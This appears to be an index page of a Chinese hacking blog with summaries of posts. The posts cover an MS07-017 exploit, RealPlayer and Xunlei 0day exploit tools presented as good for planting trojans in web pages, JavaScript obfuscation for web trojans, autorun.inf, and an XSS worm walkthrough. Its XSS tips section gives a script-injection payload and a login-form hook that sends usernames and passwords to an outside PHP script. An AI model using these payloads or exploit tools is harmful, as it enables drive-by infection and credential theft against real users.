MS07-017 windows 2000 and windows xp sp2 真正修改能用版本(fixed)
摘要: 注:Windows2000_CN SP2(我只有這臺(tái)SP2的2k測試機(jī)),WindowsXP_CN SP2測試通過
網(wǎng)上流傳的都TMD垃圾不能用,不知道抄來抄去轉(zhuǎn)來轉(zhuǎn)去哪些代碼轉(zhuǎn)錯(cuò)了
這個(gè)是我自己修改過的
閱讀全文
Realplay ActiveX 0day 利用工具
摘要: 注:Windows2003_CN SP1 / WindowsXP_CN SP2 + RealPlay10.0 測試通過
好像10.5以下版本都中,這個(gè)似乎只能溢出一次,第一次溢出成功后,第二次開始會(huì)有realplay修復(fù)數(shù)據(jù)庫的提示,點(diǎn)修復(fù)就中,取消不中
上次測試使用的"Windows 按鈕突破專家" 4.5K 溢出沒問題,但是"iecv.exe"那個(gè)87K
溢出的時(shí)候老是看不到界面,其實(shí)已經(jīng)執(zhí)行(進(jìn)程中可以看到),不知道為什么(不知道是否大小問題)
另:IE5不中,代碼中直接跳過了
閱讀全文
迅雷5 0day 利用工具
摘要: 迅雷官方最新版本迅雷(Thunder5.7.4.401)依然受此漏洞影響
掛馬相當(dāng)好用,只是如果用iframe,寬高不能為0
(pplayer.dll 組件版本號(hào):1.2.3.49,CLSID:F3E70CEA-956E-49CC-B444-73AFE593AD7F)
閱讀全文
JavaScript加密解密7種方法
摘要: 本文一共介紹了七種javascript加密方法:
在做網(wǎng)頁時(shí)(其實(shí)是網(wǎng)頁木馬呵呵),最讓人煩惱的是自己辛辛苦苦寫出來的客戶端IE運(yùn)行的javascript代碼常常被別人輕易的拷貝,實(shí)在讓自己的心里有點(diǎn)不是滋味,要知道自己寫點(diǎn)東西也挺累的......^*^
但我們也應(yīng)該清楚地認(rèn)識(shí)到因?yàn)閖avascript代碼是在IE中解釋執(zhí)行,要想絕對(duì)的保密是不可能的,我們要做的就是盡可能的增大拷貝者復(fù)制的難度,讓他知難而退(但愿~!~),下面我結(jié)合自己這幾年來的實(shí)踐,及個(gè)人研究的心得,和大家一起來探討一下網(wǎng)頁中javascript代碼的加密解密技術(shù)。
以加密下面的javascript代碼為例:
......
閱讀全文
VC編譯優(yōu)化設(shè)置
摘要: VC- Project Setting-Debug-Project Option語法解釋
-優(yōu)化-
/O1 最小化空間 minimize space
/Op[-] 改善浮點(diǎn)數(shù)一致性 improve floating-pt consistency
/O2 最大化速度 maximize speed
/Os 優(yōu)選代碼空間 favor code space
/Oa 假設(shè)沒有別名 assume no aliasing
/Ot 優(yōu)選代碼速度 favor code speed
/Ob 內(nèi)聯(lián)展開(默認(rèn) n=0) inline expansion (default n=0)
/Ow 假設(shè)交叉函數(shù)別名 assume cross-function aliasing
/Od 禁用優(yōu)化(默認(rèn)值) disable optimizations (default)
/Ox 最大化選項(xiàng)。(/Ogityb2 /Gs) maximum opts. (/Ogityb1 /Gs)
/Og 啟用全局優(yōu)化
閱讀全文
autorun.inf完全操作手冊(cè)(ZT)
摘要: 一、autorun.inf是windows下操縱光盤行為的一個(gè)文件,需要放在光盤根目錄下,部分操作對(duì)于硬盤也適用。
二、autorun.inf是可以被禁止的。方法如下:
點(diǎn)擊開始->運(yùn)行,在文本框中輸入regedit或者regedt32。依次展開HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer,其中的NoDriveTypeAutoRun子鍵限制著Autorun的作用范圍,默認(rèn)為95(16進(jìn)制)。
................
閱讀全文
一些XSS小技巧(ZT)
摘要: 1.最短的動(dòng)態(tài)插入JS.
代碼:
<x/**/style=xss:expression(document.appendChild(document.createElement('script')).src='xss.js')>
2.獲取表單密碼.
代碼:
window.onload=function(){document.forms['login'].onsubmit=function(){var a=new Image();a.src="http://127.0.0.1/loveshell.php"+this.username.value+"&"+this.password.value;this.submit();}};
.......
閱讀全文
程序多開器
摘要: 使用OD反匯編修改NateOn,雖然很麻煩,最終還是搞定了,后來發(fā)現(xiàn)網(wǎng)上有段代碼,直接可以實(shí)現(xiàn)程序多開,測試了MSN、NateOn沒問題,代碼如下:
.386
.model flat, stdcall
option casemap :none
include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
............
閱讀全文
完整XSS wrom入侵流程(ZT)
摘要: 不說廢話,且看怎么實(shí)現(xiàn),我先拿SOHU BLOG做示范.
1.測試過濾字符,下面都是構(gòu)造XSS所需要的關(guān)鍵字符(未包含全角字符,空格是個(gè)TABLE,\/前是真正的空格),在個(gè)人檔案處看過濾了哪些.
’’;:!--"<javascript JAvaSCriPT>={()} \/
結(jié)果
’’;:!--"={()} // (&后是amp,論壇過濾了)
.........
閱讀全文